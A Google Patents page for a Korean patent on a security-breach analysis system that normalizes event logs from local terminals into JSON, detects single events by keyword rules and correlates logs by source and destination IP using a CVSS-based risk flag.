KR101788410B1 - 보안 이벤트로그 분석을 통한 보안침해 분석시스템 및 분석방법 - Google Patents
보안 이벤트로그 분석을 통한 보안침해 분석시스템 및 분석방법 Download PDFInfo
- Publication number
- KR101788410B1 KR101788410B1 KR1020150161973A KR20150161973A KR101788410B1 KR 101788410 B1 KR101788410 B1 KR 101788410B1 KR 1020150161973 A KR1020150161973 A KR 1020150161973A KR 20150161973 A KR20150161973 A KR 20150161973A KR 101788410 B1 KR101788410 B1 KR 101788410B1
- Authority
- KR
- South Korea
- Prior art keywords
- event
- log
- event log
- security
- contents
- Prior art date
- Legal status (The legal status is an assumption and is not a legal conclusion. Google has not performed a legal analysis and makes no representation as to the accuracy of the status listed.)
- Active
Links
- 238000004458 analytical method Methods 0.000 title claims abstract description 112
- 238000000034 method Methods 0.000 claims abstract description 14
- 238000001514 detection method Methods 0.000 claims description 126
- 238000010606 normalization Methods 0.000 claims description 22
- 238000005259 measurement Methods 0.000 claims description 10
- 238000012351 Integrated analysis Methods 0.000 abstract description 2
- 239000000284 extract Substances 0.000 description 5
- 238000010586 diagram Methods 0.000 description 4
- 230000000694 effects Effects 0.000 description 4
- 238000004364 calculation method Methods 0.000 description 3
- 238000002347 injection Methods 0.000 description 3
- 239000007924 injection Substances 0.000 description 3
- 230000009545 invasion Effects 0.000 description 2
- 239000000463 material Substances 0.000 description 2
- 238000012986 modification Methods 0.000 description 2
- 230000004048 modification Effects 0.000 description 2
- 230000008520 organization Effects 0.000 description 2
- 238000012545 processing Methods 0.000 description 2
- 230000008685 targeting Effects 0.000 description 2
- 230000002159 abnormal effect Effects 0.000 description 1
- 230000000903 blocking effect Effects 0.000 description 1
- 238000004891 communication Methods 0.000 description 1
- 239000002131 composite material Substances 0.000 description 1
- 238000004590 computer program Methods 0.000 description 1
- 238000012217 deletion Methods 0.000 description 1
- 230000037430 deletion Effects 0.000 description 1
- 230000001419 dependent effect Effects 0.000 description 1
- 238000005516 engineering process Methods 0.000 description 1
- 238000012806 monitoring device Methods 0.000 description 1
- 230000002265 prevention Effects 0.000 description 1
- 238000012502 risk assessment Methods 0.000 description 1
- 239000000243 solution Substances 0.000 description 1
- 230000002123 temporal effect Effects 0.000 description 1
- 229960005486 vaccine Drugs 0.000 description 1
Images
Classifications
-
- H—ELECTRICITY
- H04—ELECTRIC COMMUNICATION TECHNIQUE
- H04L—TRANSMISSION OF DIGITAL INFORMATION, e.g. TELEGRAPHIC COMMUNICATION
- H04L63/00—Network architectures or network communication protocols for network security
- H04L63/14—Network architectures or network communication protocols for network security for detecting or protecting against malicious traffic
- H04L63/1408—Network architectures or network communication protocols for network security for detecting or protecting against malicious traffic by monitoring network traffic
- H04L63/1425—Traffic logging, e.g. anomaly detection
-
- H—ELECTRICITY
- H04—ELECTRIC COMMUNICATION TECHNIQUE
- H04L—TRANSMISSION OF DIGITAL INFORMATION, e.g. TELEGRAPHIC COMMUNICATION
- H04L63/00—Network architectures or network communication protocols for network security
- H04L63/30—Network architectures or network communication protocols for network security for supporting lawful interception, monitoring or retaining of communications or communication related information
- H04L63/308—Network architectures or network communication protocols for network security for supporting lawful interception, monitoring or retaining of communications or communication related information retaining data, e.g. retaining successful, unsuccessful communication attempts, internet access, or e-mail, internet telephony, intercept related information or call content
Landscapes
- Engineering & Computer Science (AREA)
- Computer Security & Cryptography (AREA)
- Computer Hardware Design (AREA)
- Computing Systems (AREA)
- General Engineering & Computer Science (AREA)
- Computer Networks & Wireless Communication (AREA)
- Signal Processing (AREA)
- Technology Law (AREA)
- Debugging And Monitoring (AREA)
Abstract
본 발명은 보안 이벤트로그 분석을 통한 보안침해 분석시스템 및 분석방법에 관한 것으로서, 보다 상세하게는 로컬단말기에서 발생하는 보안침해 과정에서 생성되는 이벤트로그를 분석하여 출발지 또는 목적지로 구분된 결과를 관리자에게 제공할 수 있도록 하는 보안 이벤트로그 분석을 통한 보안침해 분석시스템 및 분석방법에 관한 것이다.
본 발명에 따르면 다양한 형태의 로컬단말기에 가해지는 보안 침해를 정규화된 이벤트로그로 기록하여 통합 분석할 수 있고, 특정 정보와 연계된 이벤트로그를 분류하여 분석함으로써 쉽게 보안 침해 요소를 파악할 수 있는 효과가 있다.
본 발명에 따르면 다양한 형태의 로컬단말기에 가해지는 보안 침해를 정규화된 이벤트로그로 기록하여 통합 분석할 수 있고, 특정 정보와 연계된 이벤트로그를 분류하여 분석함으로써 쉽게 보안 침해 요소를 파악할 수 있는 효과가 있다.
Description
본 발명은 보안 이벤트로그 분석을 통한 보안침해 분석시스템 및 분석방법에 관한 것으로서, 보다 상세하게는 로컬단말기에서 발생하는 보안침해 과정에서 생성되는 이벤트로그를 분석하여 출발지 또는 목적지로 구분된 결과를 관리자에게 제공할 수 있도록 하는 보안 이벤트로그 분석을 통한 보안침해 분석시스템 및 분석방법에 관한 것이다.
정보시스템 자산의 증가와 함께 다양한 환경의 운영체제(OS)나 모바일단말기용 응용 프로그램(APPLICATION), 보안 솔루션이 개발되어 사용되고 있다. 이와 같은 다양한 환경에서 기록되는 보안 이벤트 역시 다양한 형태로 저장되고, 그 용량도 빠른 속도로 커지고 있다.
다양한 종류의 로컬단말기에서 발생하는 보안 침해에 관련된 이벤트는 로컬단말기 또는 네트워크상의 감시장치에 의해 이벤트로그로 기록된다. 관리자는 생성된 이벤트로그를 분석하여 보안 침해의 피해를 확인하고, 추가적인 침해를 예방할 수 있도록 조치를 취하게 된다.
도 1은 종래기술에 따른 네트워크 위험도 종합 분석시스템을 나타낸 블럭도이다.
도 1의 분석시스템에 포함된 다수의 탐지센서(10)는 각각이 담당하는 네트워크에서 발생하는 보안 이벤트들을 실시간으로 수집하여 해당 보안 이벤트의 목적지IP를 포함하는 로그 파일 형태로 DB에 저장한다. 다수의 탐지센서(10)는 자체적으로 네트워크 보안 운영 방침을 기준으로 관리자 측에서 정한 위험수준 및 신뢰도 연산식을 이용하여 수집한 보안 이벤트에 대한 위험수준과 신뢰도를 산정하고 산정한 위험수준과 신뢰도를 상기 로그 파일에 추가하여 해당 로그 파일을 DB에 저장한다.
로그 파일 정규화부(11)는 상기 각각의 탐지센서(10)의 DB로부터 보안 이벤트의 로그 파일을 수집하여 각각의 보안 이벤트의 로그 파일을 네트워크 보안 운영 방침을 기준으로 관리자 측에서 설정한 정규화 정보를 포함하는 정규화 로그 파일 형태로 변환한다.
개별 위험도 산정부(13)는 상기 자산가치 산정부(12)에서 보안 이벤트의 정규화 로그 파일에 대응하여 산정한 네트워크의 IT 자산의 자산가치와 해당 정규화 로그 파일로부터 식별되는 위험수준 및 신뢰도를 네트워크 보안 운영 방침을 기준으로 관리자 측에서 정한 위험도 연산식에 대입하여 보안 이벤트들의 개별 위험도를 산정하고, 산정한 위험도가 미리 정한 위험도 이상이면 알람 발생 신호를 출력한다.
그런데 이러한 종래기술에서는 생성된 네트워크 기반 보안 이벤트로그를 분석하여 위험도를 측정하는데, 경우에 따라서는 서로 관련이 있는 다양한 보안 이벤트를 그룹화하여 분석하는 것이 효율적이다. 또한 네트워크 기반의 보안 이벤트로그를 분석하는 종래기술에서는 이와 같은 필요가 있어도 연관된 분석방법을 제공하지 못하기 때문에 효율적인 대처가 어려워지는 문제가 있었다.
전술한 문제점을 해결하기 위한 본 발명은 로컬단말기 및 네트워크 기반에서 생성되는 다양한 형식의 보안 이벤트로그를 하나의 형식으로 정규화하고, 정규화된 이벤트로그를 JSON 파일 형태로 가공하여 데이터베이스 저장소(NoSQL; Not Only SQL)에 저장하며, 저장된 이벤트로그를 분석하여 보안 침해 요소를 분석하도록 하는 보안 이벤트로그 분석을 통한 보안침해 분석시스템 및 분석방법을 제공하는 것을 목적으로 한다.
또한 본 발명은 이벤트로그 분석 결과 위험도 플래그에 따라서 출발지 또는 목적지를 기준으로 하여 다양한 이벤트로그의 연계분석을 실시함으로써 보안 침해의 흐름, 위치 및 위협, 취약성 등을 정확하게 파악할 수 있도록 하는 보안 이벤트로그 분석을 통한 보안침해 분석시스템 및 분석방법을 제공하는 것을 목적으로 한다.
전술한 문제점을 해결하기 위해 안출된 본 발명은 로컬단말기(200)에서 발생하는 보안 이벤트를 분석하여 관리자에게 제공하는 보안침해 분석시스템으로서, 상기 로컬단말기(200)에 설치된 로컬로그수집부(202)가 수집하여 전송한 이벤트로그를 수신하여 통합로그DB(114)에 저장하는 통합로그수집부(102)와; 상기 통합로그수집부(102)가 수신한 상기 이벤트로그를 정규화하여 JSON(JavaScript Object Notation) 파일 형태로 변환하고, 정규화된 이벤트로그를 상기 통합로그DB(114)에 저장하는 로그정규화부(104)와; 이벤트탐지룰DB(112)에 저장된 탐지룰을 참조하여 상기 정규화된 이벤트로그를 분석하고, 상기 이벤트로그에 보안침해 가능성이 있는 이벤트 기록이 포함되어 있는지를 분석하는 단일이벤트탐지부(106)와; 상기 단일이벤트탐지부(106)의 분석 대상이 되는 이벤트로그에 부여된 위험도 플래그가 소정의 값일 경우, 복수의 이벤트로그를 연계하여 분석하는 연계분석부(108)와; 상기 이벤트탐지룰DB(112)에 저장된 탐지룰의 위험도 플래그 컬럼을 참조하여 탐지대상이 되는 상기 이벤트로그의 연계로그유형을 결정하는 위험도측정부(110);를 포함한다.
상기 정규화된 이벤트로그는 "TIME, TYPE, HOST, SRC, DST, CONTENTS_001, CONTENTS_002, CONTENTS_003, CONTENTS_004, LINKED_LOGTYPE"의 필드로 된 데이터로 구성되며, TIME은 보안이벤트의 탐지시각을 unixtime 형식으로 기록한 것이며, TYPE은 보안 이벤트의 유형이며, HOST는 보안 이벤트의 탐지가 이루어진 센서의 IP 주소 또는 호스트 네임이며, SRC는 보안 이벤트에서 출발지의 IP이며, DST는 보안 이벤트에서 목적지의 IP이며, CONTENTS_001 내지 CONTENTS_004는 보안 이벤트에서 발생하는 상세 내용이며, LINKED_LOGTYPE은 연계분석을 수행할 이벤트로그의 대상을 정의한 것으로서 단일 이벤트 발생 시점을 전후하여 일정 시간동안 일정 임계치 이상 보안 이벤트가 발생한 이벤트로그인 것을 특징으로 한다.
상기 연계분석부(108)는 탐지대상이 되는 이벤트로그에 포함된 위험도 플래그가 1인 경우, 상기 이벤트로그에서 SRC를 추출하여 "LINKED_LOGTYPE"에 정의된 이벤트로그를 대상으로 SRC와 DST의 OR 연산에 의한 연계분석을 실시하며, 탐지대상이 되는 이벤트로그에 포함된 위험도 플래그가 2인 경우, 상기 이벤트로그에서 DST를 추출하여 "LINKED_LOGTYPE"에 정의된 이벤트로그를 대상으로 SRC와 DST의 OR 연산에 의한 연계분석을 실시하며, 탐지대상이 되는 이벤트로그에 포함된 위험도 플래그가 3인 경우, 상기 이벤트로그에서 SRC와 DST를 추출하여 "LINKED_LOGTYPE"에 정의된 이벤트로그를 대상으로 SRC와 DST의 AND 연산에 의한 연계분석을 실시하는 것을 특징으로 한다.
상기 단일이벤트탐지부(106)는 상기 정규화된 이벤트로그에 포함된 데이터 중에서 상기 CONTENTS_001 내지 CONTENTS_004에 대하여 상기 이벤트탐지룰DB(112)에서 참조하는 키워드를 AND, OR, NOT 연산자 조합을 통하여 패턴 매칭하는 컨텐츠 기반 탐지와, 상기 HOST와 상기 SRC, 상기 DST에 대하여 상기 이벤트탐지룰DB(112)에서 참조하는 키워드를 AND, OR, NOT 연산자 조합을 패턴 매칭하는 호스트 기반 탐지 중 하나의 방법을 사용하는 것을 특징으로 한다.
다른 실시예에 따른 본 발명은 보안침해 분석시스템을 이용한 보안침해 분석방법으로서, 로컬단말기(200)에 설치된 로컬로그수집부(202)가 이벤트로그를 수집하여 전송하면, 통합로그수집부(102)가 수신하여 통합로그DB(114)에 저장하는 제1단계와; 상기 통합로그수집부(102)가 수신한 상기 이벤트로그를 로그정규화부(104)가 정규화하여 JSON(JavaScript Object Notation) 파일 형태로 변환하고, 정규화된 이벤트로그를 상기 통합로그DB(114)에 저장하는 제2단계와; 단일이벤트탐지부(106)가 이벤트탐지룰DB(112)에 저장된 탐지룰을 참조하여 상기 정규화된 이벤트로그를 분석하고, 상기 이벤트로그에 보안침해 가능성이 있는 이벤트 기록이 포함되어 있는지를 분석하는 제3단계와; 위험도측정부(110)가 상기 이벤트탐지룰DB(112)에 저장된 탐지룰의 위험도 플래그 컬럼을 참조하여 탐지대상이 되는 상기 이벤트로그의 연계로그유형을 결정하는 제4단계와; 연계분석부(108)가 상기 단일이벤트탐지부(106)의 분석 대상이 되는 이벤트로그에 대한 위험도 플래그가 소정의 값일 경우, 복수의 이벤트로그를 연계하여 분석하는 제5단계;를 포함한다.
상기 정규화된 이벤트로그는 "TIME, TYPE, HOST, SRC, DST, CONTENTS_001, CONTENTS_002, CONTENTS_003, CONTENTS_004, LINKED_LOGTYPE"의 필드로 된 데이터로 구성되며, TIME은 보안이벤트의 탐지시각을 unixtime 형식으로 기록한 것이며, TYPE은 보안 이벤트의 유형이며, HOST는 보안 이벤트의 탐지가 이루어진 센서의 IP이며, SRC는 보안 이벤트에서 출발지의 IP이며, DST는 보안 이벤트에서 목적지의 IP이며, CONTENTS_001 내지 CONTENTS_004는 보안 이벤트에서 발생하는 상세 내용이며, LINKED_LOGTYPE은 연계분석을 수행할 이벤트로그의 대상을 정의한 것으로서 단일 이벤트 발생 시점을 전후하여 일정 시간동안 일정 임계치 이상 보안 이벤트가 발생한 이벤트로그인 것을 특징으로 한다.
상기 연계분석부(108)는 탐지대상이 되는 이벤트로그에 포함된 위험도 플래그가 1인 경우, 상기 이벤트로그에서 SRC를 추출하여 "LINKED_LOGTYPE"에 정의된 이벤트로그를 대상으로 SRC와 DST의 OR 연산에 의한 연계분석을 실시하며, 탐지대상이 되는 이벤트로그에 포함된 위험도 플래그가 2인 경우, 상기 이벤트로그에서 DST를 추출하여 "LINKED_LOGTYPE"에 정의된 이벤트로그를 대상으로 SRC와 DST의 OR 연산에 의한 연계분석을 실시하며, 탐지대상이 되는 이벤트로그에 포함된 위험도 플래그가 3인 경우, 상기 이벤트로그에서 SRC와 DST를 추출하여 "LINKED_LOGTYPE"에 정의된 이벤트로그를 대상으로 SRC와 DST의 AND 연산에 의한 연계분석을 실시하는 것을 특징으로 한다.
상기 단일이벤트탐지부(106)는 상기 정규화된 이벤트로그에 포함된 데이터 중에서 상기 CONTENTS_001 내지 CONTENTS_004에 대하여 상기 이벤트탐지룰DB(112)에서 참조하는 키워드를 AND, OR, NOT 연산자 조합을 통하여 패턴 매칭하는 컨텐츠 기반 탐지와, 상기 HOST와 상기 SRC, 상기 DST에 대하여 상기 이벤트탐지룰DB(112)에서 참조하는 키워드를 AND, OR, NOT 연산자 조합을 패턴 매칭하는 호스트 기반 탐지 중 하나의 방법을 사용하는 것을 특징으로 한다.
본 발명에 따르면 다양한 형태의 로컬단말기에 가해지는 보안 침해를 정규화된 이벤트로그로 기록하여 통합 분석할 수 있고, 특정 정보와 연계된 이벤트로그를 분류하여 분석함으로써 쉽게 보안 침해 요소 및 위협, 취약성 등을 파악할 수 있는 효과가 있다.
또한 시간대별로 이벤트 발생 순서를 정렬하여 보안 침해 시도 과정을 쉽게 확인할 수 있어서 이벤트 분석에 소요되는 인적, 시간적, 물적 자원을 최소화할 수 있는 효과가 있다.
도 1은 종래기술에 따른 네트워크 위험도 종합 분석시스템을 나타낸 블럭도.
도 2는 본 발명의 실시예에 따른 보안침해 분석시스템의 구조와 연결상태를 나타낸 블럭도.
도 3은 본 발명의 분석시스템을 이용한 보안침해 분석방법의 과정을 나타낸 순서도.
도 4는 이벤트탐지룰DB에 포함된 탐지룰의 일례를 나타낸 테이블.
도 5a와 5b는 이벤트로그에 대한 연계분석을 한 결과를 나타낸 테이블.
도 2는 본 발명의 실시예에 따른 보안침해 분석시스템의 구조와 연결상태를 나타낸 블럭도.
도 3은 본 발명의 분석시스템을 이용한 보안침해 분석방법의 과정을 나타낸 순서도.
도 4는 이벤트탐지룰DB에 포함된 탐지룰의 일례를 나타낸 테이블.
도 5a와 5b는 이벤트로그에 대한 연계분석을 한 결과를 나타낸 테이블.
이하에서 도면을 참조하여 본 발명의 실시예에 따른 "보안 이벤트로그 분석을 통한 보안침해 분석시스템 및 분석방법"을 설명한다.
도 2는 본 발명의 실시예에 따른 보안침해 분석시스템의 구조와 연결상태를 나타낸 블럭도이다.
본 발명의 "보안 이벤트로그 분석을 통한 보안침해 분석시스템"(이하, '분석시스템'이라 함)은 네트워크 기반으로 연결된 원격지의 로컬단말기(200)에서 발생하는 보안 침해 이벤트를 수집하여 분석하고, 분석된 결과를 관리자단말기(300)에게 제공하여 위험요소를 제거하도록 하는 기능을 한다. 경우에 따라서는 네트워크 기반이 아닌 장치들에서 발생하는 보안 이벤트를 수집하여 분석할 수도 있을 것이다. 이 경우에는 실시간으로 보안 이벤트를 수집할 수 없으므로, 일정 주기로 또는 특별한 이벤트 발생시에 이벤트로그를 입력하여 분석할 수 있다.
로컬단말기(200)에 설치된 로컬로그수집부(202)는 로컬단말기(200)에서 발생하는 다양한 형태의 보안 이벤트를 감시하고, 이벤트에서 생성되는 보안 관련 이벤트 로그(이하 '이벤트로그'라 함)를 수집한다. 로컬로그수집부(202)는 로컬단말기(200)에서 수집한 이벤트로그를 분석시스템(100)으로 전송한다.
분석시스템(100)에는 통합로그수집부(102), 로그정규화부(104), 단일이벤트탐지부(106), 연계분석부(108), 위험도측정부(110), 이벤트탐지룰DB(112), 통합로그DB(114)가 포함된다.
통합로그수집부(102)는 로컬로그수집부(202)로부터 전송된 이벤트로그를 받아서 통합로그DB(114)에 저장한다.
로그정규화부(104)는 분석시스템(100)에 저장된 여러 가지 형태의 이벤트로그를 정규화하여 JSON 파일 형태로 통합로그DB(114)에 저장하도록 한다. 로그정규화부(104)는 다양한 형태의 로그 포맷을 텍스트(txt) 로그 형태로 전환하고, 이를 JSON(JavaScript Object Notation) 파일 형태로 정규화한다. JSON 파일은 속성-값 쌍으로 이루어진 데이터 오브젝트를 전달하기 위해 인간이 읽을 수 있는 텍스트를 사용하는 개방형 표준 포맷이다. 비동기 브라우저/서버 통신(AJAX)을 위해, 넓게는 XML을 대체하는 주요 데이터 포맷이다. JSON 파일로 표현할 수 있는 자료의 종류에 큰 제한은 없으며, 특히 컴퓨터 프로그램의 변수값을 표현하는 데 적합하다.
본 발명에서 이벤트로그를 JSON 형태로 정규화하는 것은 NoSQL 기반 통합로그DB(114)에 기록하기가 편리하기 때문이다.
본 발명의 로그정규화부(104)가 정규화하여 저장하는 이벤트로그의 속성은 시간정보나 탐지 센서, 출발지 및 도착지 정보, 송수신되는 컨텐츠, 연계분석 보안 이벤트 대상 등을 나타내는데, 상세한 내용은 후술한다.
단일이벤트탐지부(106)는 이벤트탐지룰DB(112)에 저장된 탐지룰을 참조하여 정규화된 JSON 파일을 스캔하고, 스캔한 결과를 분석하여 참(true)/거짓(false)을 결정한다. 그리고 단일이벤트탐지부(106)는 분석한 결과가 참일 경우, 이벤트로그 JSON 파일을 가공하여 관리자에게 경고 알람을 보낸다. 본 발명에서 스캔 결과가 참이라는 것은 탐지대상이 되는 이벤트로그에 보안침해의 가능성이 있는 이벤트 기록이 포함되어 있다는 의미이다.
연계분석부(108)는 단일이벤트탐지부(106)의 결과가 참인 보안이벤트의 위험도 플래그 속성을 참조하여 연계분석이 필요한 이벤트에 대해서 연계분석을 실시한다. 연계분석이란 보안 이벤트로그에 포함된 필드 중에서 특정 필드를 기준으로 이벤트로그의 연관성을 분석하여 정렬함으로써 다수의 이벤트를 일목 요연하게 관찰할 수 있도록 하는 분석을 의미한다.
본 발명에서는 연계분석 여부를 결정하기 위해서 단일이벤트탐지 결과가 참인 경우, 해당 이벤트탐지룰의 위험도 플래그(FLAG)를 확인한다. 위험도 플래그는 관리자가 설정하는 정보보호지침 및 활동의 경험, CVE(Common Vulnerabilities & Exposures; 공통 보안 취약성 및 노출) 등을 참조하여 결정한다. 위험도 플래그에 따라서 연계분석부(108)는 이벤트로그에 포함된 복수의 이벤트로그를 연계하여 분석 후, 결과를 정렬시킨다.
위험도측정부(110)는 이벤트탐지룰DB(112)의 특정 컬럼(위험도 플래그 컬럼)을 참조하여 단일 이벤트의 연계로그유형을 결정한다.
이벤트탐지룰DB(112)는 이벤트로그에 대한 탐지룰을 저장한다. 탐지룰은 분석시스템(100) 또는 보안업무의 관리자가 결정하여 등록하는 것으로서, 분석시스템(100)에 의해 단일분석 또는 연계분석 대상이 될 이벤트로그를 선택하는 기준이 된다.
도 4는 이벤트탐지룰DB에 포함된 탐지룰의 일례를 나타낸 테이블이다. 탐지룰에 포함되는 각각의 데이터 필드의 의미는 다음의 표 1과 같다.
| 이벤트탐지룰DB 컬럼 | 정의 |
| logType | 탐지대상이 되는 보안 이벤트 |
| keyword | 단일 보안 이벤트 탐지에 사용되는 문자열 키워드 |
| history | 보안 관리자가 기록한 탐지룰의 이력 |
| registertime | 탐지룰의 생성일 |
| supervisionid | 탐지룰을 등록한 보안 관리자/시스템의 고유값 |
| cnt | 탐지룰의 인덱스 번호 |
| flag | 위험도 플래그 |
"logtype"은 본 발명에서 탐지대상이 되는 보안 이벤트의 유형으로서, 네트워크 패킷 이벤트로그(syslogs), 방화벽 정책 이벤트로그(iptableslogs), 침입탐지/차단시스템 이벤트로그(detectionlogs), 백신 악성코드 이벤트로그(infectedlogs), 라우터/스위치 네트워크 이벤트로그(networklogs), 리눅스 SSH(Secure Shell) 이벤트로그(securelogs), 웹 방화벽 이벤트로그(waflogs), 리눅스 시스템 명령 실행 이벤트로그(cmdlogs), 악성코드 배포지 이벤트로그(malwarelogs), VPN(Virtual Private Network) 이벤트로그(vpnlogs), 윈도우 원격 터미널 이벤트로그(eventlogs), 파일 시스템 모니터 이벤트로그(filemonlogs), 윈도우 레지스트리(Registry) 이벤트로그(regmonlogs), 웹을 통한 실행파일 다운로드 이벤트로그(httpdlogs), 정보시스템 도메인 쿼리 이벤트로그(dnslogs), 웹 접근 이벤트로그(accesslogs), 데이터베이스 이벤트로그(dblogs), 시스템 보안 패치 이벤트로그(patchlogs), 시스템 계정 이벤트로그(userlogs), 시스템 네트워크 이벤트로그(netstatelogs), 루트킷 이벤트로그(rootkitlogs) 등으로 구성된다.
각 보안이벤트는 로그 파일, DB , 네트워크 Pcap(Packet Capture)파일 형태 등등 로컬단말기 구성환경에 종속적인 형태로 기록되게 된다.
"history"는 탐지룰에 대한 정의 및 특징을 기록하는데, 분석시스템(100) 또는 보안 관리자에 의한 탐지룰의 등록이나 수정, 삭제 등의 이력를 관리하기 위한 컬럼으로 사용된다.
"registertime"은 탐지룰의 생성 시간을 기록하는데, 탐지룰이 등록/생성된 일시(DateTime)를 정의한다.
"supervisionid"는 탐지룰을 등록한 보안 관리자 또는 시스템의 고유값으로서, 보안 관리자의 ID를 의미한다.
"cnt"는 탐지룰의 인덱스(index) 번호를 기록하는데, 보안 관리자 또는 시스템이 탐지룰을 등록/생성할 때마다 순차적으로 증가하는 인덱스 번호를 생성한다.
"flag"는 위험도 플래그를 기록한다. 위험도 플래그는 탐지룰에 대한 위험도(CVE, 정보보호지침, 정보보호조직 경험 기반으로 위험도 판정)를 위험도 플래그 측정 연산식에 대입하여 결정된다.
위험도 플래그가 0인 경우에는 단일이벤트탐지부(106)가 하나의 이벤트로그를 대상으로 하는 단일 이벤트 분석을 한다. 그러나 위험도 플래그가 1이나 2, 3일 경우에는 연계분석부(108)가 복수의 이벤트로그를 서로 연계하여 분석을 실시한다. 위험도 플래그가 1일 경우에는 SRC(출발지의 IP)를 기반으로 연계분석을 하고, 위험도 플래그가 2일 경우에는 DST(목적지의 IP)를 기반으로 연계분석을 한다. 그리고 3일 경우에는 SRC와 DST를 기반으로 연계분석을 하는데, 이에 대해서는 후술한다.
통합로그DB(114)에는 로컬단말기(200)로부터 수집된 이벤트로그와, 로그정규화부(104)에 의해 JSON 파일 형태로 변환된 정규화 이벤트로그가 저장된다.
이상과 같은 구성을 이용하여 보안침해를 분석하는 방법에 대해서 자세하게 설명한다.
도 3은 본 발명의 분석시스템을 이용한 보안침해 분석방법의 과정을 나타낸 순서도이다.
먼저 로컬단말기(200)는 다양한 형태의 보안 이벤트를 수집하여 이벤트로그에 기록하고, 통합로그수집부(102)는 로컬단말기(200)로부터 이벤트로그를 받아서 통합로그DB(114)에 저장한다.(S102)
로컬단말기(200)에서 수집하는 보안 이벤트 목록은 "logtype"에 기재되는 이벤트 목록과 동일하다.
로그정규화부(104)는 통합로그수집부(102)에 의해 통합로그DB(114)에 저장된 보안 이벤트로그를 정규화하여 통합로그DB(114)에 저장한다.(S104)
이벤트로그의 정규화는 서로 다른 형태로 기록된 이벤트로그에서 공통되는 속성을 지닌 데이터 필드를 묶어서 보여줌으로써 관리자가 빠르게 보안 이벤트의 내용을 파악할 수 있도록 하기 위한 것이다.
이벤트로그의 정규화는 보안시스템의 종류와 특성에 따라서 달라질 수 있는데, 본 발명에서는 이벤트로그에 포함된 데이터를 "TIME, TYPE, HOST, SRC, DST, CONTENTS_001, CONTENTS_002, CONTENTS_003, CONTENTS_004, LINKED_LOGTYPE"으로 정렬한다.
각각의 필드가 나타내는 정보는 다음의 표 2와 같다.
| 필드 | 정의 |
| TIME | 보안 이벤트의 탐지 시각 |
| TYPE | 보안 이벤트의 유형 |
| HOST | 보안 이벤트의 탐지가 이루어진 센서의 IP 주소 또는 호스트 네임 |
| SRC | 보안 이벤트의 출발지의 IP |
| DST | 보안 이벤트의 목적지의 IP |
| CONTENTS_001 ~ CONTENTS_004 | 보안 이벤트에서 발생하는 상세 내용 |
| LINKED_LOGTYPE | 보안 이벤트 연계분석 대상 |
TIME 필드에는 보안 이벤트의 탐지시각을 unixtimestamp 형식으로 기록한다.
HOST 필드에는 IPv4 기반의 탐지 센서의 IP 주소 또는 호스트 네임을 기록한다. 호스트 네임은 DNS Resolving이 가능한 것을 선택한다.
SRC와 DST 필드에 기록되는 IP 역시 IPv4 기반의 주소를 기록한다.
CONTENTS 필드에는 이벤트로그 생성시에 기록되는 세부 내용이 기재되며, 이벤트로그별 키워드의 구체적인 내용이 포함될 수도 있다.
LINKED_LOGTYPE 필드에는 해당 이벤트로그가 연계분석을 수행할 다양한 이벤트로그의 대상이 정의된다. 연계분석을 수행할 대상은 특정한 단일 이벤트 발생 시점을 전후하여 일정 시간동안 일정 임계치 이상 보안 이벤트가 발생한 이벤트로그가 된다.
예를 들어, 2015년 11월 2일 오후 1시에 특정한 단일 보안 이벤트가 발생하여 이를 단일 분석 대상으로 했다면, 오후 1시를 전후하여 1시간 동안 10회 이상의 이상 보안 이벤트가 발생한 다른 이벤트로그를 연계분석 대상으로 할 수 있다. 즉, 오후 12시부터 오후 2시까지의 두 시간동안 10회 이상 보안 이벤트가 발생했던 유형의 이벤트로그를 선택한다.
기준이 되는 시각과 전후 시간의 길이, 이상 보안 이벤트의 임계치 등의 기준은 보안 관리자 또는 시스템이 적절하게 선택할 수 있다.
단일이벤트탐지부(106)는 정규화되어 JSON 파일 형태로 저장된 이벤트로그를 추출하고, 로그 파일에서 단일이벤트를 탐지하여 위험성을 분석한다.(S106) 단일이벤트탐지부(106)는 보안 이벤트의 탐지룰을 기준으로 분석하는데, 먼저 탐지룰에서 단일 보안 이벤트 탐지 대상으로 규정되어 있는지를 확인한다. 본 발명에서는 탐지룰에 저장된 주요한 탐지 키워드가 개별 보안 이벤트에서 발생하는 경우에 탐지대상이 되는 것으로 설정한다.
단일이벤트탐지부(106)는 보안 이벤트 세부 내용 중에서 CONTENTS_001, CONTENTS_002, CONTENTS_003, CONTENTS_004를 대상으로 하는 컨텐츠 기반 탐지와, [HOST, SRC, DST]를 대상으로 하는 호스트 기반 탐지를 복합적으로 사용한다.
컨텐츠 기반 탐지의 경우 이벤트로그의 세부내용이 기록되는 CONTENTS_001 내지 CONTENTS_004에 대하여 이벤트탐지룰DB(112)에서 참조하는 키워드를 패턴 매칭하게 되는데, AND, OR, NOT 연산자 조합을 통하여 탐지한다.
호스트 기반 탐지의 경우 이벤트로그의 IP가 기록되게 되는 HOST, SRC, DST에 대하여 이벤트탐지룰DB(112)에서 참조하는 키워드를 패턴 매칭하게 되는데, AND, OR, NOT 연산자 조합을 통하여 탐지한다.
단일이벤트탐지부(106)는 단일 분석 결과를 가공하여, 정보보호를 담당하는 관리자에게 알람 시그널을 전송한다.
다음으로 위험도측정부(110)는 단일이벤트탐지부(106)에 의하여 탐지되어진 보안 이벤트로그를 대상으로 이벤트탐지룰DB(112)의 위험도 플래그를 참조하여 연계로그유형(LINKED_LOGTYPE)을 결정하여 저장한다.(S108)
위험도 플래그는 정보보호 활동을 수행하는 정보보호관리자가 이벤트탐지룰DB(112)에 단일이벤트 탐지룰 등록/생성시 결정되는데, 조직내 정보보호지침, 정보보호 활동의 경험, CVE(Common Vulnerabilities & Exposures; 공통 보안 취약성 및 노출)를 고려하여 정한 위험도 플래그 측정 연산식에 대입하여 결정한다.
CVE의 경우에는 CVSS(Common Vulnerability Scoring system)에 의해 분류된 High/Medium/Low를 참조한다. 예를 들어 CVSS에 의해 분류된 등급이 High일 경우에는 7점 내지 10점을 부여하고, Medium일 경우에는 4점 내지 6.9점, Low일 경우에는 0점 내지 3.9점을 부여한다. 경우에 따라서는 Medium 이상일 경우와 이하일 경우로 2분화할 수도 있다.
정보보호지침의 경우에는 침해 시도 등급 기준으로 1등급을 '상'으로, 2등급을 '중'으로, 3등급을 '하'로 분류하여 소정의 점수를 부여한다. 경우에 따라서는 2등급 이상일 경우에 위험도 플래그를 상승시키도록 할 수도 있다.
정보보호의 관리자가 정보보호조직의 보안 이슈/분석에서의 경험을 참조하여 플래그값을 결정하도록 할 수도 있을 것이다.
